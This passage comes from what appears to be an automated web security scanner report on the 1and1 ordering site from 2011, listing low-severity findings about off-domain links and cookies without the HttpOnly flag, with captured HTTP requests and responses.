<span class="container"><img class="price-graphic alphapng" width="121" height="83" src="//img.1und1.de/OdinPrice/blue/xl/dollar/0/00/none/month-star.png" alt="0.00 &#8364;/month*"><span class="horz-l-price-text offer">
...[SNIP]...
<span class="container"><img class="price-graphic alphapng" width="121" height="83" src="//img.1und1.de/OdinPrice/blue/xl/dollar/0/00/none/month-star.png" alt="0.00 &#8364;/month*"><span class="horz-l-price-text offer">
...[SNIP]...

4.14. http://order.1and1.com/xml/order/ServerPremium  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/ServerPremium

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:36 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykeJWx1Oy4vKyovLCksJyorJCU=; Expires=Fri, 07-Apr-2079 21:47:43 GMT; Path=/
ETag: 4ad2d8e7cdb21186fe994e75ac91e0f5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 32407


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="starting at 0.00 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="91" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/59/99/none/month.png" alt="$59.99 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="91" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/99/99/none/month.png" alt="$99.99 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="113" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/149/99/none/month.png" alt="$149.99 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="from 0.00 &#8364;/month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="from 0.00 &#8364;/month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="from 0.00 &#8364;/month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="113" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/499/99/none/month.png" alt="$499.99 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="113" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/699/99/none/month.png" alt="$699.99 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="113" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/999/99/none/month.png" alt="$999.99 /month*"></span>
...[SNIP]...

4.15. http://order.1and1.com/xml/order/Sharepoint  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:34:33 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:48:40 GMT; Path=/
ETag: 5de0f14c7355940110db8a760b729cda
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25629


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="89" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/19/99/none/none.png" alt="only $ 19.99 per month"><span class="text-bottom">
...[SNIP]...
</span><img class="price-graphic alphapng" width="89" height="44" src="//img.1und1.de/OdinPrice/white/m/dollar/19/99/none/none.png" alt="only $ 19.99 per month"><span class="text-bottom">
...[SNIP]...

4.16. http://order.1and1.com/xml/order/VirtualServer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServer

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=CloudDynamicServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=YZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:30:AAABLtRnZNPcSJFdN9f55FNyE*t5Qv64:1300643669203; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=yZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; Expires=Fri, 07-Apr-2079 21:08:23 GMT; Path=/
ETag: dd3a6908188586141eb93efcd06408c1
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 25297


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="starting at 0.00 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="90" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/29/00/none/month-star.png" alt="starting at $29.00 /month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="$0.00"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/00/none/month-star.png" alt="$0.00"></span>
...[SNIP]...

4.17. http://order.1and1.com/xml/order/VirtualServerL  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:54:24 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=aZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCYmJSMhIyY=; Expires=Fri, 07-Apr-2079 21:08:31 GMT; Path=/
ETag: 8445c1f0969d65ef75b448c84b35d290
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 48662


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" width="195" height="99" src="//img.1und1.de/OdinPrice/yellow/xxl/dollar/29/00/none/month-star.png" alt="from 29.00 &#8364;/month*"></span>
...[SNIP]...
</span><img class="price-graphic alphapng" width="195" height="99" src="//img.1und1.de/OdinPrice/yellow/xxl/dollar/29/00/none/month-star.png" alt="from 29.00 &#8364;/month*"></span>
...[SNIP]...

4.18. http://order.1and1.com/xml/order/eshopupselling  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xml/order/eshopupselling;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642661298&__frame=&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642657924&__frame=_top
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=domaincheck; ucuo=20110320183705-002.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:10:AAABLtRYUG7moGPNuumv6jupqX3xwRRp:1300642680942; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=PbWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 20:51:50 GMT; Path=/
ETag: 9764ec14efbf07d8da12215d59db0368
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19469


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<span class="container"><img class="price-graphic alphapng" width="158" height="126" src="//img.1und1.de/OdinPrice/yellow/xxl/dollar/0/00/none/month-star.png" alt="ab 0.00 &#8364;/Monat*"><span class="horz-xxl-price-text offer">
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 172 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://order.1and1.com/xml/order  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 14:50:49 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7f633103f81ccc00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a
Content-Length: 0
Content-Type: text/plain


5.2. http://order.1and1.com/xml/order  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /xml/order;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 14:50:50 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: variant.configname=2010-04-14; Expires=Fri, 07-Apr-2079 18:04:57 GMT; Path=/
Set-Cookie: variant=QUM6ZGVmYXVsdA==; Expires=Fri, 07-Apr-2079 18:04:57 GMT; Path=/
Set-Cookie: UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; Expires=Fri, 07-Apr-2079 18:04:57 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 0


5.3. http://order.1and1.com/xml/order/AboutUs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/AboutUs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.about HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:36:13 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Sal8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:50:20 GMT; Path=/
ETag: e6a6b2f2d5c47aa1786c232b8ba23026
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20254


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.4. http://order.1and1.com/xml/order/AboutUs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/AboutUs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/AboutUs HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:35:59 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=40ed56ac00b05400; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/AboutUs;jsessionid=976EECE32E6B69E9E9B7889A1B137418.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.5. http://order.1and1.com/xml/order/CloudDynamicServer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/CloudDynamicServer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=5ace75f3e6dc4c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=135525E4885300E7C3599BEAAA938DAF.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.6. http://order.1and1.com/xml/order/CloudDynamicServer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
